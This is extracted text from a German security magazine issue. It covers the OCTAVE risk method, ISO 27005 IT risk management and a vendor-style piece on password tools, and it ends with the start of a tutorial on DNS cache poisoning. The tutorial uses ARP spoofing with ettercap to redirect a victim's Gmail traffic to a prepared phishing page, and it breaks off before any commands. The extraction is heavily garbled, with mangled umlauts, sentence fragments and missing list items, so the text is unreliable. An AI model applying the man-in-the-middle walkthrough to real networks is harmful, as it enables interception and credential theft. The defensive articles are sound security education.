ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
